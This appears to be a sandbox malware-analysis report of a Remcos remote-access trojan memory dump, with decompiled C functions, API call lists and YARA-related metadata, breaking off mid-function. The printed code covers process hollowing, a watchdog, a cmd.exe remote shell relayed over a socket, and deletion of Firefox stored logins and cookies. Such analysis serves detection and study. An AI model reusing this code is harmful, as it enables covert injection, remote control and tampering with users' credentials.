                                    0x006dfd59
                                    0x006dfd5e
                                    0x006dfd5f
                                    0x006dfd60
                                    0x006dfd61
                                    0x006dfd63
                                    0x006dfd71
                                    0x006dfd76
                                    0x006dfd7d
                                    0x006dfd83
                                    0x006dfd8a
                                    0x006dfd8e
                                    0x006dfd8e
                                    0x00000000
                                    0x006dfd8a
                                    0x00000000
                                    0x006dfb95
                                    0x006dfaf8
                                    0x006dfaf8
                                    0x006dfafa
                                    0x006dfd2d
                                    0x00000000

                                    APIs
                                    • GetCurrentProcessId.KERNEL32 ref: 006DFAD3
                                      • Part of subcall function 006E0BB0: RegCreateKeyA.ADVAPI32(80000001,00000000,0072F6BC), ref: 006E0BBE
                                      • Part of subcall function 006E0BB0: RegSetValueExA.ADVAPI32(0072F6BC,000000AF,00000000,00000004,00000001,00000004,?,?,?,006DA669,0072FEF8,00000001,000000AF,0072F6BC), ref: 006E0BD9
                                      • Part of subcall function 006E0BB0: RegCloseKey.ADVAPI32(0072F6BC,?,?,?,006DA669,0072FEF8,00000001,000000AF,0072F6BC), ref: 006E0BE4
                                    • OpenMutexA.KERNEL32 ref: 006DFB0D
                                    • CloseHandle.KERNEL32(00000000), ref: 006DFB1C
                                    • CreateThread.KERNEL32 ref: 006DFB72
                                    • OpenProcess.KERNEL32(001FFFFF,00000000,?), ref: 006DFD3A
                                    Strings
                                    Memory Dump Source
                                    • Source File: 0000001C.00000002.409473011.00000000006D0000.00000040.00000001.sdmp, Offset: 006D0000, based on PE: true
                                    • Associated: 0000001C.00000002.409660028.000000000073F000.00000040.00000001.sdmp Download File
                                    Yara matches
                                    Similarity
                                    • API ID: CloseCreateOpenProcess$CurrentHandleMutexThreadValue
                                    • String ID: Mutex_RemWatchdog$Remcos restarted by watchdog!$WDH$Watchdog launch failed!$Watchdog module activated$WinDir$[ERROR]$[Info]$\SysWOW64$\svchost.exe$\system32
                                    • API String ID: 3018269243-3797382479
                                    • Opcode ID: 9fa9a3350b7a76c9ecaf69b7b7bb648a7d4732f3f09900eb378e9d6b846fd5ea
                                    • Instruction ID: 66e310589d87d50dd6374201b723d7605c4b2fb895153f54a053407363e0d190
                                    • Opcode Fuzzy Hash: 9fa9a3350b7a76c9ecaf69b7b7bb648a7d4732f3f09900eb378e9d6b846fd5ea
                                    • Instruction Fuzzy Hash: C4513531E04241ABD658BB70DC57C6F73A79EA2710F50042FF802563E3EFB49A05C6AA
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Function 006E412B, Relevance: 31.7, APIs: 17, Strings: 1, Instructions: 184COMMON
                                    Download Yara Rule
                                    C-Code - Quality: 79%
                                    			E006E412B(WCHAR* __ecx, void* __edx, struct _PROCESS_INFORMATION* _a4) {
				void _v8;
				signed int _v12;
				void* _v16;
				CONTEXT* _v20;
				WCHAR* _v24;
				struct _STARTUPINFOW _v92;
				void* __edi;
				void* _t58;
				void _t72;
				void* _t73;
				int _t83;
				intOrPtr* _t95;
				void* _t98;
				signed int _t102;
				void* _t104;
				void* _t106;
				CONTEXT* _t110;
				void* _t113;
				CONTEXT* _t114;
				struct _PROCESS_INFORMATION* _t116;

				_v8 = _v8 & 0x00000000;
				_v16 = __edx;
				_v24 = __ecx;
				if( *__edx == 0x5a4d) {
					_t95 =  *((intOrPtr*)(__edx + 0x3c)) + __edx;
					if( *_t95 == 0x4550) {
						_push(_t106);
						E00701F00(_t106,  &_v92, 0, 0x44);
						_t116 = _a4;
						asm("stosd");
						asm("stosd");
						asm("stosd");
						asm("stosd");
						if(CreateProcessW(0, _v24, 0, 0, 0, 4, 0, 0,  &_v92, _t116) == 0) {
							L21:
							_t58 = 0;
							L22:
							L23:
							return _t58;
						}
						CloseHandle(_v92.hStdInput);
						CloseHandle(_v92.hStdOutput);
						CloseHandle(_v92.hStdError);
						_t110 = VirtualAlloc(0, 4, 0x1000, 4);
						_v20 = _t110;
						_t110->ContextFlags = 0x10007;
						_t14 =  &(_t116->hThread); // 0xffffdcf2
						if(GetThreadContext( *_t14, _t110) == 0 || ReadProcessMemory(_t116->hProcess, _t110->Ebx + 8,  &_v8, 4, 0) == 0) {
							L20:
							TerminateProcess(_t116->hProcess, 0);
							CloseHandle(_t116->hProcess);
							_t50 =  &(_t116->hThread); // 0xffffdcf2
							CloseHandle( *_t50);
							asm("stosd");
							asm("stosd");
							asm("stosd");
							asm("stosd");
							goto L21;
						} else {
							_t72 = _v8;
							if(_t72 ==  *(_t95 + 0x34)) {
								 *0x73bd24(_t116->hProcess, _t72);
							}
							_t73 = VirtualAllocEx(_t116->hProcess,  *(_t95 + 0x34),  *(_t95 + 0x50), 0x3000, 0x40);
							_v24 = _t73;
							if(_t73 == 0) {
								goto L20;
							} else {
								_t113 = _v16;
								if(WriteProcessMemory(_t116->hProcess, _t73, _t113,  *(_t95 + 0x54), 0) == 0) {
									goto L20;
								}
								_v12 = _v12 & 0x00000000;
								if(0 >=  *(_t95 + 6)) {
									L14:
									_t98 = _t95 + 0x34;
									_t114 = _v20;
									if(_v8 ==  *_t98) {
										L17:
										_t114->Eax =  *((intOrPtr*)(_t95 + 0x28)) + _v24;
										_t48 =  &(_t116->hThread); // 0xffffdcf2
										if(SetThreadContext( *_t48, _t114) == 0) {
											goto L20;
										}
										_t49 =  &(_t116->hThread); // 0xffffdcf2
										if(ResumeThread( *_t49) == 0xffffffff) {
											goto L20;
										}
										_t58 = 1;
										goto L22;
									}
									_t83 = WriteProcessMemory(_t116->hProcess, _t114->Ebx + 8, _t98, 4, 0);
									if(_t83 != 0) {
										goto L17;
									}
									TerminateProcess(_t116->hProcess, _t83);
									goto L21;
								}
								_t104 = 0;
								_v16 = 0;
								do {
									_t28 = _t113 + 0x3c; // 0x83ffc983
									WriteProcessMemory( *_t116,  *((intOrPtr*)( *_t28 + _t104 + _t113 + 0x104)) + _v24,  *((intOrPtr*)( *_t28 + _t104 + _t113 + 0x10c)) + _t113,  *( *_t28 + _t104 + _t113 + 0x108), 0);
									_t37 =  &_v16; // 0x6e433b
									_t102 = _v12 + 1;
									_t104 =  *_t37 + 0x28;
									_v12 = _t102;
									_v16 = _t104;
								} while (_t102 < ( *(_t95 + 6) & 0x0000ffff));
								goto L14;
							}
						}
					}
					_t58 = 0;
					goto L23;
				}
				return 0;
			}























                                    0x006e4131
                                    0x006e413a
                                    0x006e413d
                                    0x006e4143
                                    0x006e4150
                                    0x006e4158
                                    0x006e4162
                                    0x006e416b
                                    0x006e4170
                                    0x006e417a
                                    0x006e417c
                                    0x006e417d
                                    0x006e417e
                                    0x006e4198
                                    0x006e4322
                                    0x006e4322
                                    0x006e4324
                                    0x006e4326
                                    0x00000000
                                    0x006e4326
                                    0x006e41a7
                                    0x006e41ac
                                    0x006e41b1
                                    0x006e41c4
                                    0x006e41c7
                                    0x006e41ca
                                    0x006e41d0
                                    0x006e41db
                                    0x006e4301
                                    0x006e4305
                                    0x006e4313
                                    0x006e4315
                                    0x006e4318
                                    0x006e431e
                                    0x006e431f
                                    0x006e4320
                                    0x006e4321
                                    0x00000000
                                    0x006e4203
                                    0x006e4203
                                    0x006e4209
                                    0x006e420e
                                    0x006e420e
                                    0x006e4223
                                    0x006e4229
                                    0x006e422e
                                    0x00000000
                                    0x006e4234
                                    0x006e4234
                                    0x006e4248
                                    0x00000000
                                    0x00000000
                                    0x006e424e
                                    0x006e4258
                                    0x006e42a2
                                    0x006e42a5
                                    0x006e42a8
                                    0x006e42ad
                                    0x006e42d5
                                    0x006e42dc
                                    0x006e42e2
                                    0x006e42ed
                                    0x00000000
                                    0x00000000
                                    0x006e42ef
                                    0x006e42fb
                                    0x00000000
                                    0x00000000
                                    0x006e42fd
                                    0x00000000
                                    0x006e42fd
                                    0x006e42c0
                                    0x006e42c8
                                    0x00000000
                                    0x00000000
                                    0x006e42cd
                                    0x00000000
                                    0x006e42cd
                                    0x006e425a
                                    0x006e425c
                                    0x006e425f
                                    0x006e425f
                                    0x006e4284
                                    0x006e428d
                                    0x006e4290
                                    0x006e4295
                                    0x006e4298
                                    0x006e429b
                                    0x006e429e
                                    0x00000000
                                    0x006e425f
                                    0x006e422e
                                    0x006e41db
                                    0x006e415a
                                    0x00000000
                                    0x006e415a
                                    0x00000000

                                    Strings
                                    Memory Dump Source
                                    • Source File: 0000001C.00000002.409473011.00000000006D0000.00000040.00000001.sdmp, Offset: 006D0000, based on PE: true
                                    • Associated: 0000001C.00000002.409660028.000000000073F000.00000040.00000001.sdmp Download File
                                    Yara matches
                                    Similarity
                                    • API ID:
                                    • String ID: ;Cn
                                    • API String ID: 0-2787214330
                                    • Opcode ID: d5e6b49f98085535ff9a713e159941a591f27370cf0e1427eae569f1a4ff857c
                                    • Instruction ID: 9c6fec6f9d40ea89296ca2016a94ca72aa2dba2e7eaafc6a523828411ba16141
                                    • Opcode Fuzzy Hash: d5e6b49f98085535ff9a713e159941a591f27370cf0e1427eae569f1a4ff857c
                                    • Instruction Fuzzy Hash: 86517F70601604FFEB209FB6CC45FAABBBAFF44701F148014F644E62A1DB75A951DB64
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Function 006D55EA, Relevance: 30.0, APIs: 15, Strings: 2, Instructions: 283pipesleepfileCOMMON
                                    Download Yara Rule
                                    C-Code - Quality: 81%
                                    			E006D55EA(char _a4) {
				long _v8;
				long _v12;
				long _v16;
				char _v40;
				char _v64;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				long _t52;
				void* _t56;
				void* _t66;
				void* _t70;
				void* _t79;
				CHAR* _t80;
				int _t98;
				intOrPtr* _t107;
				intOrPtr _t138;
				signed int _t146;
				signed int _t147;
				long _t151;
				void* _t155;
				intOrPtr* _t156;
				void* _t163;
				void* _t168;
				void* _t175;

				_t156 = _t155 - 0x3c;
				_push(_t146);
				_t138 =  *((intOrPtr*)( *[fs:0x2c]));
				_t147 = _t146 | 0xffffffff;
				_t98 = 0;
				if( *0x73dce8 >  *((intOrPtr*)(_t138 + 4))) {
					E006FF114(0x73dce8);
					_t160 =  *0x73dce8 - _t147;
					if( *0x73dce8 == _t147) {
						E006D484E(0, 0x73dc60, 0);
						E006FF49E(_t160, E007227B3);
						 *_t156 = 0x73dce8;
						E006FF0D5(_t147);
					}
				}
				if( *0x73dcc8 >  *((intOrPtr*)(_t138 + 4))) {
					E006FF114(0x73dcc8);
					_t162 =  *0x73dcc8 - _t147;
					if( *0x73dcc8 == _t147) {
						E006D20D5(_t98, 0x73dcf0);
						E006FF49E(_t162, E007227A9);
						E006FF0D5(_t147, 0x73dcc8);
					}
				}
				_t100 =  &_v40;
				E006D20D5(_t98,  &_v40);
				_t139 = 0x73c2d0;
				_v8 = _t98;
				_t163 =  *0x73bae2 - _t98; // 0x0
				if(_t163 != 0) {
					L12:
					_v12 = _t98;
					PeekNamedPipe( *0x73dcd0, _t98, _t98, _t98,  &_v12, _t98);
					if(_v12 <= _t98) {
						_t156 = _t156 - 0x18;
						E006D2084(_t98, _t156, 0x72f6bc);
						_push(0x62);
						_t147 = E006D4AA4(_t98, 0x73dc60, _t136, __eflags);
						goto L21;
					}
					_push(_v12);
					_t56 = E007094F6(_t100);
					_t140 = _t56;
					ReadFile( *0x73dcd0, _t56, _v12,  &_v16, _t98);
					if(_v16 <= _t98) {
						L19:
						L007094F1(_t140);
						_t139 = 0x73c2d0;
						goto L21;
					}
					if(_v8 <= _t98) {
						L17:
						E006D2084(_t98,  &_v64, _t140);
						_t156 = _t156 - 0x18;
						_t107 = _t156;
						_push(_v16);
						_push(_t98);
						L18:
						E006D5A14(_t98, _t107, _t136, _t172);
						_t147 = E006D4AA4(_t98, 0x73dc60, _t136, _t172, 0x62,  &_v64);
						E006D1FC7();
						goto L19;
					}
					_t66 = E00709510(_t140, E006D1F95( &_v40), _v8);
					_t156 = _t156 + 0xc;
					_t172 = _t66;
					if(_t66 != 0) {
						goto L17;
					}
					E006D2084(_t98,  &_v64, _t140);
					_t156 = _t156 - 0x18;
					_t107 = _t156;
					_push(_v16 - _v8);
					_push(_v8);
					goto L18;
				} else {
					_t136 = "cmd.exe";
					_t70 = E006D5A6F("cmd.exe");
					_t164 = _t70;
					if(_t70 == 0) {
						L26:
						E006D4E0B(0x73dc60);
						CloseHandle( *0x73dcd0);
						CloseHandle( *0x73dcec);
						 *0x73bae2 = _t98;
						_t98 = 1;
						L27:
						E006D1FC7();
						E006D1FC7();
						return _t98;
					}
					E006D5A0B(_t98, 0x73dcf0, E0070988A(_t98, _t164, "SystemDrive"));
					E006D5A02(_t98, 0x73dcf0, 0x73c2d0, "\\");
					0x73dc08->nLength = 0xc;
					 *0x73dc10 = 1;
					 *0x73dc0c = _t98;
					if(CreatePipe(0x73dce4, 0x73dccc, 0x73dc08, _t98) == 0 || CreatePipe(0x73dcd0, 0x73dcec, 0x73dc08, _t98) == 0) {
						goto L27;
					} else {
						_t151 = 0x44;
						E00701F00(0x73dc18, 0x73dc18, _t98, CreatePipe);
						0x73dc18->cb = _t151;
						 *0x73dc44 = 0x101;
						 *0x73dc48 = 0;
						 *0x73dc50 =  *0x73dce4;
						_t79 =  *0x73dcec;
						 *0x73dc54 = _t79;
						 *0x73dc58 = _t79;
						_t80 = E006D1F95(0x73dcf0);
						 *0x73bae2 = CreateProcessA(_t98, E006D1F95(0x73c2d0), _t98, _t98, 1, _t98, _t98, _t80, 0x73dc18, 0x73dcd4) != 0;
						E006D5A0B(_t98, 0x73c2d0, 0x72f6bc);
						 *0x73bae3 = 1;
						E006D498B(0x73dc60);
						asm("movsd");
						asm("movsd");
						asm("movsd");
						asm("movsd");
						E006D4A08("cmd.exe");
						_t156 = _t156 + 0xc - 0xfffffffffffffff8;
						E006D20EC(_t98, _t156, "cmd.exe", CreateProcessA(_t98, E006D1F95(0x73c2d0), _t98, _t98, 1, _t98, _t98, _t80, 0x73dc18, 0x73dcd4),  &_a4);
						_push(0x93);
						_t100 = 0x73dc60;
						_t147 = E006D4AA4(_t98, 0x73dc60, "cmd.exe", CreateProcessA(_t98, E006D1F95(0x73c2d0), _t98, _t98, 1, _t98, _t98, _t80, 0x73dc18, 0x73dcd4));
						Sleep(0x12c);
						_t168 =  *0x73bae2 - _t98; // 0x0
						if(_t168 == 0) {
							goto L26;
						}
						_t139 = 0x73c2d0;
						do {
							goto L12;
							L21:
							_t38 =  <=  ? 0 :  *0x73bae3 & 0x000000ff;
							_t100 = _t139;
							 *0x73bae3 =  <=  ? 0 :  *0x73bae3 & 0x000000ff;
							if(E006D2489() == 0) {
								_v8 = _t98;
							} else {
								E006D5A02(_t98, _t139, _t139, "\n");
								E006D1FAD( &_v40, _t139);
								_t52 = E006D2489();
								WriteFile( *0x73dccc, E006D1F95(_t139), _t52,  &_v8, _t98);
								_t100 = _t139;
								E006D5A0B(_t98, _t139, 0x72f6bc);
							}
							Sleep(0x64);
							_t175 =  *0x73bae3 - _t98; // 0x0
						} while (_t175 != 0);
						TerminateProcess(0x73dcd4->hProcess, _t98);
						CloseHandle( *0x73dcd8);
						CloseHandle( *0x73dcd4);
						goto L26;
					}
				}
			}





























                                    0x006d55f3
                                    0x006d55f7
                                    0x006d55f9
                                    0x006d55fb
                                    0x006d5603
                                    0x006d560b
                                    0x006d5612
                                    0x006d5618
                                    0x006d561e
                                    0x006d5626
                                    0x006d5630
                                    0x006d5635
                                    0x006d563c
                                    0x006d5641
                                    0x006d561e
                                    0x006d564d
                                    0x006d5655
                                    0x006d565b
                                    0x006d5661
                                    0x006d5668
                                    0x006d5672
                                    0x006d5679
                                    0x006d567e
                                    0x006d5661
                                    0x006d567f
                                    0x006d5682
                                    0x006d5687
                                    0x006d568c
                                    0x006d568f
                                    0x006d5695
                                    0x006d580b
                                    0x006d580f
                                    0x006d581c
                                    0x006d5825
                                    0x006d58c7
                                    0x006d58d1
                                    0x006d58d6
                                    0x006d58e2
                                    0x00000000
                                    0x006d58e2
                                    0x006d582b
                                    0x006d582e
                                    0x006d5835
                                    0x006d5845
                                    0x006d584e
                                    0x006d58b9
                                    0x006d58ba
                                    0x006d58c0
                                    0x00000000
                                    0x006d58c0
                                    0x006d5853
                                    0x006d5888
                                    0x006d588c
                                    0x006d5891
                                    0x006d5894
                                    0x006d5896
                                    0x006d5899
                                    0x006d589a
                                    0x006d589e
                                    0x006d58b2
                                    0x006d58b4
                                    0x00000000
                                    0x006d58b4
                                    0x006d5862
                                    0x006d5867
                                    0x006d586a
                                    0x006d586c
                                    0x00000000
                                    0x00000000
                                    0x006d5872
                                    0x006d587d
                                    0x006d5880
                                    0x006d5882
                                    0x006d5883
                                    0x00000000
                                    0x006d569b
                                    0x006d569b
                                    0x006d56a2
                                    0x006d56a7
                                    0x006d56a9
                                    0x006d5982
                                    0x006d5987
                                    0x006d5992
                                    0x006d599e
                                    0x006d59a4
                                    0x006d59aa
                                    0x006d59ac
                                    0x006d59af
                                    0x006d59b7
                                    0x006d59c4
                                    0x006d59c4
                                    0x006d56c2
                                    0x006d56ce
                                    0x006d56ea
                                    0x006d56f4
                                    0x006d56fe
                                    0x006d5708
                                    0x00000000
                                    0x006d5724
                                    0x006d5726
                                    0x006d572f
                                    0x006d5737
                                    0x006d573f
                                    0x006d5749
                                    0x006d575e
                                    0x006d5763
                                    0x006d5769
                                    0x006d576e
                                    0x006d5773
                                    0x006d579c
                                    0x006d57a3
                                    0x006d57ad
                                    0x006d57b4
                                    0x006d57c3
                                    0x006d57c4
                                    0x006d57c5
                                    0x006d57c6
                                    0x006d57ce
                                    0x006d57d3
                                    0x006d57dc
                                    0x006d57e1
                                    0x006d57e6
                                    0x006d57f2
                                    0x006d57f4
                                    0x006d57fa
                                    0x006d5800
                                    0x00000000
                                    0x00000000
                                    0x006d5806
                                    0x006d580b
                                    0x00000000
                                    0x006d58e4
                                    0x006d58ef
                                    0x006d58f2
                                    0x006d58f4
                                    0x006d5900
                                    0x006d5946
                                    0x006d5902
                                    0x006d5909
                                    0x006d5912
                                    0x006d591e
                                    0x006d5932
                                    0x006d593d
                                    0x006d593f
                                    0x006d593f
                                    0x006d594b
                                    0x006d5951
                                    0x006d5951
                                    0x006d5964
                                    0x006d5970
                                    0x006d597c
                                    0x00000000
                                    0x006d597c
                                    0x006d5708

                                    APIs
                                    • __Init_thread_footer.LIBCMT ref: 006D563C
                                      • Part of subcall function 006D4AA4: send.WS2_32(?,00000000,00000000,00000000), ref: 006D4B18
                                    • __Init_thread_footer.LIBCMT ref: 006D5679
                                    • CreatePipe.KERNEL32(0073DCE4,0073DCCC,0073DC08,00000000,0072F6D4,00000000), ref: 006D5704
                                    • CreatePipe.KERNEL32(0073DCD0,0073DCEC,0073DC08,00000000), ref: 006D571A
                                    • CreateProcessA.KERNEL32(00000000,00000000,00000000,00000000,00000001,00000000,00000000,00000000,0073DC18,0073DCD4), ref: 006D578D
                                    • Sleep.KERNEL32(0000012C,00000093,?), ref: 006D57F4
                                    • PeekNamedPipe.KERNEL32(00000000,00000000,00000000,?,00000000), ref: 006D581C
                                    • ReadFile.KERNEL32(00000000,?,?,00000000), ref: 006D5845
                                      • Part of subcall function 006FF49E: __onexit.LIBCMT ref: 006FF4A4
                                    • WriteFile.KERNEL32(00000000,00000000,?,00000000,0073C2D0,0072F6D8,00000062,0072F6BC), ref: 006D5932
                                    • Sleep.KERNEL32(00000064,00000062,0072F6BC), ref: 006D594B
                                    • TerminateProcess.KERNEL32(00000000), ref: 006D5964
                                    • CloseHandle.KERNEL32 ref: 006D5970
                                    • CloseHandle.KERNEL32 ref: 006D597C
                                    • CloseHandle.KERNEL32 ref: 006D5992
                                    • CloseHandle.KERNEL32 ref: 006D599E
                                    Strings
                                    Memory Dump Source
                                    • Source File: 0000001C.00000002.409473011.00000000006D0000.00000040.00000001.sdmp, Offset: 006D0000, based on PE: true
                                    • Associated: 0000001C.00000002.409660028.000000000073F000.00000040.00000001.sdmp Download File
                                    Yara matches
                                    Similarity
                                    • API ID: CloseHandle$CreatePipe$FileInit_thread_footerProcessSleep$NamedPeekReadTerminateWrite__onexitsend
                                    • String ID: SystemDrive$cmd.exe
                                    • API String ID: 2994406822-3633465311
                                    • Opcode ID: 589f8e094af703fea4b16e16888eb7a04d1ac95e7d0d43f6730355b929532828
                                    • Instruction ID: 5c422f6bf884386307849886d802852942b346f39d503ea5507244a64bb8d8ef
                                    • Opcode Fuzzy Hash: 589f8e094af703fea4b16e16888eb7a04d1ac95e7d0d43f6730355b929532828
                                    • Instruction Fuzzy Hash: 4C91E4B1E00114AFE721BB64ED969AE7BABBF44711F04902EF501A7362DFB84D01D768
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Function 006DA012, Relevance: 24.7, APIs: 8, Strings: 6, Instructions: 152fileCOMMON
                                    Download Yara Rule
                                    C-Code - Quality: 95%
                                    			E006DA012(void* __ebx, void* __edi, void* __eflags) {
				char _v28;
				char _v52;
				char _v76;
				char _v100;
				char _v124;
				char _v148;
				struct _WIN32_FIND_DATAA _v468;
				void* __esi;
				void* __ebp;
				void* _t45;
				signed int _t58;
				signed int _t59;
				signed int _t73;
				signed int _t75;
				char* _t108;
				signed int _t109;
				char* _t129;
				void* _t130;
				void* _t134;
				void* _t135;
				void* _t136;
				void* _t137;

				_t142 = __eflags;
				_t134 = __edi;
				_t89 = __ebx;
				E006D20D5(__ebx,  &_v100);
				E006D20D5(__ebx,  &_v76);
				E006D20D5(__ebx,  &_v28);
				_t45 = E006D2084(_t89,  &_v124, "\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\");
				E006D1FD1( &_v28, _t46, _t135, E006D75C2(_t89,  &_v52, E0070988A(_t89, __eflags, "UserProfile"), _t134, _t142, _t45));
				E006D1FC7();
				E006D1FC7();
				_t128 =  &_v28;
				_t136 = FindFirstFileA(E006D1F95(E006D7558( &_v124,  &_v28, _t142, "*")),  &_v468);
				E006D1FC7();
				_t143 = _t136 - 0xffffffff;
				if(_t136 != 0xffffffff) {
					while(1) {
						L15:
						__eflags = FindNextFileA(_t136,  &_v468);
						if(__eflags == 0) {
							break;
						}
						__eflags = _v468.dwFileAttributes & 0x00000010;
						if((_v468.dwFileAttributes & 0x00000010) == 0) {
							continue;
						}
						_t108 =  &(_v468.cFileName);
						__eflags =  *_t108 - 0x2e;
						if( *_t108 != 0x2e) {
							L5:
							_t129 =  &(_v468.cFileName);
							_t109 = 0;
							__eflags = 0;
							while(1) {
								_t58 =  *(_t129 + _t109) & 0x000000ff;
								_t130 = "..";
								__eflags = _t58 -  *((intOrPtr*)(_t130 + _t109));
								_t128 =  &(_v468.cFileName);
								if(_t58 !=  *((intOrPtr*)(_t130 + _t109))) {
									break;
								}
								_t109 = _t109 + 1;
								__eflags = _t109 - 3;
								if(_t109 != 3) {
									continue;
								}
								_t59 = 0;
								L10:
								__eflags = _t59;
								if(__eflags != 0) {
									E006D1FD1( &_v100, _t61, _t136, E006D5343(_t89,  &_v52, E006D7558( &_v148,  &_v28, __eflags,  &(_v468.cFileName)), _t134, __eflags, "\\logins.json"));
									E006D1FC7();
									E006D1FC7();
									_t128 = E006D7558( &_v52,  &_v28, __eflags,  &(_v468.cFileName));
									E006D1FD1( &_v76, _t67, _t136, E006D5343(_t89,  &_v148, _t67, _t134, __eflags, "\\key3.db"));
									E006D1FC7();
									E006D1FC7();
									_t73 = DeleteFileA(E006D1F95( &_v100));
									__eflags = _t73;
									if(_t73 == 0) {
										GetLastError();
									}
									_t75 = DeleteFileA(E006D1F95( &_v76));
									__eflags = _t75;
									if(_t75 == 0) {
										GetLastError();
									}
								}
								goto L15;
							}
							asm("sbb eax, eax");
							_t59 = _t58 | 0x00000001;
							__eflags = _t59;
							goto L10;
						}
						__eflags =  *(_t108 + 1) & 0x000000ff;
						if(( *(_t108 + 1) & 0x000000ff) == 0) {
							continue;
						}
						goto L5;
					}
					E006D2084(_t89, _t137 - 0x18, "\n[Firefox StoredLogins Cleared!]");
					E006DA6EF(_t89, _t128, __eflags);
					FindClose(_t136);
					goto L17;
				} else {
					FindClose(_t136);
					E006D2084(_t89, _t137 - 0x18, "\n[Firefox StoredLogins not found]");
					E006DA6EF(_t89,  &_v28, _t143);
					L17:
					E006D1FC7();
					E006D1FC7();
					E006D1FC7();
					return 1;
				}
			}

























                                    0x006da012
                                    0x006da012
                                    0x006da012
                                    0x006da01f
                                    0x006da027
                                    0x006da02f
                                    0x006da03c
                                    0x006da05c
                                    0x006da064
                                    0x006da06c
                                    0x006da07d
                                    0x006da09a
                                    0x006da09c
                                    0x006da0a1
                                    0x006da0a4
                                    0x006da1da
                                    0x006da1da
                                    0x006da1e8
                                    0x006da1ea
                                    0x00000000
                                    0x00000000
                                    0x006da0cd
                                    0x006da0d4
                                    0x00000000
                                    0x00000000
                                    0x006da0da
                                    0x006da0e0
                                    0x006da0e3
                                    0x006da0f1
                                    0x006da0f1
                                    0x006da0f7
                                    0x006da0f7
                                    0x006da0f9
                                    0x006da0f9
                                    0x006da0fd
                                    0x006da102
                                    0x006da105
                                    0x006da10b
                                    0x00000000
                                    0x00000000
                                    0x006da10d
                                    0x006da10e
                                    0x006da111
                                    0x00000000
                                    0x00000000
                                    0x006da113
                                    0x006da11c
                                    0x006da11c
                                    0x006da11e
                                    0x006da14e
                                    0x006da156
                                    0x006da161
                                    0x006da17e
                                    0x006da190
                                    0x006da19b
                                    0x006da1a3
                                    0x006da1b1
                                    0x006da1b7
                                    0x006da1b9
                                    0x006da1bb
                                    0x006da1bb
                                    0x006da1ca
                                    0x006da1d0
                                    0x006da1d2
                                    0x006da1d4
                                    0x006da1d4
                                    0x006da1d2
                                    0x00000000
                                    0x006da11e
                                    0x006da117
                                    0x006da119
                                    0x006da119
                                    0x00000000
                                    0x006da119
                                    0x006da0e9
                                    0x006da0eb
                                    0x00000000
                                    0x00000000
                                    0x00000000
                                    0x006da0eb
                                    0x006da1fa
                                    0x006da1ff
                                    0x006da208
                                    0x00000000
                                    0x006da0aa
                                    0x006da0ab
                                    0x006da0bb
                                    0x006da0c0
                                    0x006da20e
                                    0x006da211
                                    0x006da219
                                    0x006da221
                                    0x006da22c
                                    0x006da22c

                                    APIs
                                    • FindFirstFileA.KERNEL32(00000000,?,00000000,\AppData\Roaming\Mozilla\Firefox\Profiles\), ref: 006DA091
                                    • FindClose.KERNEL32(00000000), ref: 006DA0AB
                                    • FindNextFileA.KERNEL32(00000000,?), ref: 006DA1E2
                                    • FindClose.KERNEL32(00000000), ref: 006DA208
                                    Strings
                                    Memory Dump Source
                                    • Source File: 0000001C.00000002.409473011.00000000006D0000.00000040.00000001.sdmp, Offset: 006D0000, based on PE: true
                                    • Associated: 0000001C.00000002.409660028.000000000073F000.00000040.00000001.sdmp Download File
                                    Yara matches
                                    Similarity
                                    • API ID: Find$CloseFile$FirstNext
                                    • String ID: [Firefox StoredLogins Cleared!]$[Firefox StoredLogins not found]$UserProfile$\AppData\Roaming\Mozilla\Firefox\Profiles\$\key3.db$\logins.json
                                    • API String ID: 1164774033-3681987949
                                    • Opcode ID: 7c6785f462d48083c4985cefad9c3b8a7f3508a311e0eada5ced8551b487e8ea
                                    • Instruction ID: ef47312ef40db7b8f5d37e7631a97a64dfaeb6b76465ce73537bf973fca4f6a9
                                    • Opcode Fuzzy Hash: 7c6785f462d48083c4985cefad9c3b8a7f3508a311e0eada5ced8551b487e8ea
                                    • Instruction Fuzzy Hash: 7C518331E041199BCB54FBB0DC66DFDB7B6AF12300F40016FE446AA292FF745A85CA5A
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Function 006DA22D, Relevance: 22.9, APIs: 8, Strings: 5, Instructions: 143fileCOMMON
                                    Download Yara Rule
                                    C-Code - Quality: 89%
                                    			E006DA22D(void* __edi, void* __eflags) {
				char _v28;
				char _v52;
				char _v76;
				char _v100;
				char _v124;
				struct _WIN32_FIND_DATAA _v444;
				void* __ebx;
				void* __esi;
				void* __ebp;
				void* _t35;
				signed int _t56;
				signed int _t57;
				long _t68;
				char* _t92;
				signed int _t93;
				void* _t102;
				char* _t105;
				void* _t106;
				void* _t108;
				void* _t109;
				void* _t110;
				void* _t111;

				_t116 = __eflags;
				_t108 = __edi;
				E006D20D5(0,  &_v52);
				E006D20D5(0,  &_v28);
				_t35 = E006D2084(0,  &_v100, "\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\");
				E006D1FD1( &_v28, _t36, _t109, E006D75C2(0,  &_v76, E0070988A(0, __eflags, "UserProfile"), _t108, _t116, _t35));
				E006D1FC7();
				E006D1FC7();
				_t104 =  &_v28;
				_t110 = FindFirstFileA(E006D1F95(E006D7558( &_v100,  &_v28, _t116, "*")),  &_v444);
				E006D1FC7();
				_t117 = _t110 - 0xffffffff;
				if(_t110 != 0xffffffff) {
					__eflags = FindNextFileA(_t110,  &_v444);
					if(__eflags == 0) {
						L17:
						E006D2084(0, _t111 - 0x18, "\n[Firefox Cookies not found]");
						E006DA6EF(0, _t104, __eflags);
						FindClose(_t110);
						goto L18;
					} else {
						__eflags = 0;
						do {
							__eflags = _v444.dwFileAttributes & 0x00000010;
							if((_v444.dwFileAttributes & 0x00000010) == 0) {
								goto L16;
							} else {
								_t92 =  &(_v444.cFileName);
								__eflags =  *_t92 - 0x2e;
								if( *_t92 != 0x2e) {
									L8:
									_t105 =  &(_v444.cFileName);
									_t93 = 0;
									while(1) {
										_t56 =  *(_t105 + _t93) & 0x000000ff;
										_t106 = "..";
										__eflags = _t56 -  *((intOrPtr*)(_t106 + _t93));
										_t104 =  &(_v444.cFileName);
										if(_t56 !=  *((intOrPtr*)(_t106 + _t93))) {
											break;
										}
										_t93 = _t93 + 1;
										__eflags = _t93 - 3;
										if(_t93 != 3) {
											continue;
										} else {
											_t57 = 0;
										}
										L13:
										__eflags = _t57;
										if(__eflags == 0) {
											goto L16;
										} else {
